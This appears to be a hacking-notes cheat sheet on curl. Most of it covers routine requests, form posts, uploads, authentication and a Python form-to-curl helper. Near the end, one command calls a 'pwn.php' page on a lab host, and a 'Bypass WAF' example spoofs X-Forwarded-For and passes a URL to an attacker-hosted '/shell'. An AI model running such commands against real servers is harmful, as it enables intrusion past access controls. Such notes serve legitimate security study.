Hack$Notes

Curl

Transfer a URL

curl is a tool to transfer data from or to a server, using one of the supported protocols:

DICT, FILE, FTP, FTPS, GOPHER, HTTP, HTTPS, IMAP, IMAPS, LDAP, LDAPS, POP3, 
POP3S, RTMP, RTSP, SCP, SFTP, SMB, SMBS, SMTP, SMTPS, TELNET and TFTP

The command is designed to work without user interaction.

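curl:
    -v: verbose output
    -F: send a multipart form field (prefix the value with @ to upload a file)
    -X: set the request method (for example POST or PUT)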

Examples

##### GET example #####
curl http://www.example.com 



##### GET example that also prints the response headers #####
curl -i http://www.example.com 



##### HEAD example #####
 curl --head http://www.example.com
or
 curl -I http://www.example.com



##### Multiple URLs #####
curl http://url1.example.com http://url2.example.com



##### Trace all connections: more than verbose #####
curl --trace-ascii output_filename.txt http://www.example.com 



##### Saves output to a file (-o takes a filename; -O takes none and uses the remote name) #####
curl http://www.example.com -o output_filename.txt



##### Passing username:password #####
 curl http://user:password@example.org/
or
 curl -u user:password http://example.org/

Get-form

<form method="GET" action="junk.cgi">
 <input type=text name="birthyear">
 <input type=submit name=press value="OK">
 </form>
 
 curl "http://www.hotmail.com/when/junk.cgi?birthyear=1905&press=OK"

Post-form

 <form method="POST" action="junk.cgi">
 <input type=text name="birthyear">
 <input type=submit name=press value=" OK ">
 </form>
 
  curl --data "birthyear=1905&press=%20OK%20"  http://www.example.com/when.cgi

File Upload Post

<form method="POST" enctype='multipart/form-data' action="upload.cgi">
 <input type=file name=upload>
 <input type=submit name=press value="OK">
</form>

curl --form upload=@localfilename --form press=OK [URL]

Hidden fields

<form method="POST" action="foobar.cgi">
 <input type=text name="birthyear">
 <input type=hidden name="person" value="daniel">
 <input type=submit name="press" value="OK">
</form>

 curl --data "birthyear=1905&press=OK&person=daniel" [URL]
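
How the Get-form, Post-form, File Upload and Hidden fields examples map onto curl arguments, as an added Python example that is not part of the original notes. The names `FormParser` and `form_to_curl` are hypothetical, only `<input>` elements are handled, and the page URL passed in is an assumption used to resolve the relative `action`.

```python
import shlex
from html.parser import HTMLParser
from urllib.parse import quote, urlencode, urljoin

class FormParser(HTMLParser):
    """Collect the first <form>'s attributes and its named <input> elements."""
    def __init__(self):
        super().__init__()
        self.form = None   # attributes of the <form> tag
        self.fields = []   # (type, name, preset value) per named input

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "form" and self.form is None:
            self.form = attrs
        elif tag == "input" and self.form is not None and attrs.get("name"):
            self.fields.append(((attrs.get("type") or "text").lower(),
                                attrs["name"], attrs.get("value") or ""))

def form_to_curl(html, page_url, user_input):
    """Return the curl command that submits the form the way a browser would."""
    parser = FormParser()
    parser.feed(html)
    if parser.form is None:
        raise ValueError("no <form> element found")
    method = (parser.form.get("method") or "GET").upper()
    target = urljoin(page_url, parser.form.get("action") or "")
    multipart = (parser.form.get("enctype") or "").lower() == "multipart/form-data"
    # Hidden and submit inputs keep the value preset in the HTML; the rest is user input.
    pairs = [(t, n, v if t in ("hidden", "submit") else user_input.get(n, v))
             for t, n, v in parser.fields]
    if method == "POST" and multipart:
        args = []
        for ftype, name, value in pairs:
            args += ["--form", name + "=" + ("@" if ftype == "file" else "") + value]
    else:
        # urlencoded forms: percent-encode every name and value (" OK " -> %20OK%20)
        encoded = urlencode([(n, v) for _, n, v in pairs], quote_via=quote)
        if method == "POST":
            args = ["--data", encoded]
        else:
            args, target = [], target + "?" + encoded
    return " ".join(["curl"] + [shlex.quote(a) for a in args + [target]])

# Constructed sample: the hidden-field form from this page, on one line.
SAMPLE_FORM = ('<form method="POST" action="foobar.cgi"><input type=text name="birthyear">'
               '<input type=hidden name="person" value="daniel">'
               '<input type=submit name="press" value="OK"></form>')

if __name__ == "__main__":
    print(form_to_curl(SAMPLE_FORM, "http://www.example.com/when/", {"birthyear": "1905"}))
```

Fields are emitted in document order, so the hidden `person` field appears before `press`; the server receives the same set of name/value pairs as in the command above.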

Put

curl --upload-file uploadfile http://www.example.com/receive.cgi

Location header

 ##### Follows redirection #####
 curl --location http://www.example.com

User-Agent

curl -A "user-agent-name" -L 10.10.10.10

-A: sets the user-agent
-L: follows the redirection

Authenticate through CLI

curl -u 'username':'password' http://10.10.10.10:8080/path/to/page
curl http://username:password@10.10.10.10:8080/login

curl -X POST http://10.10.10.10:8080/login -d 'user=username&password=password'
curl -X POST http://10.10.10.10:8080/login -d 'username=username&password=password'

JSON Web Token:
curl http://10.10.10.10:8080/login -H 'Authorization: Bearer token_here'
curl -s http://10.10.10.10:8080/users/1 -H 'Authorization: Bearer token_here'
curl -s http://10.10.10.10:8080/users/Admin -H 'Authorization: Bearer token_here'

Curl Call

curl --user username:password 10.10.10.10/pwn.php

Bypass WAF and pass data

curl -X POST http://10.10.10.10/some_content -H "Content-Type: application/json" -H "X-Forwarded-For: localhost" --data '{"user":"myusername","url":"http://10.10.10.20/shell"}'

Last updated 3 years ago
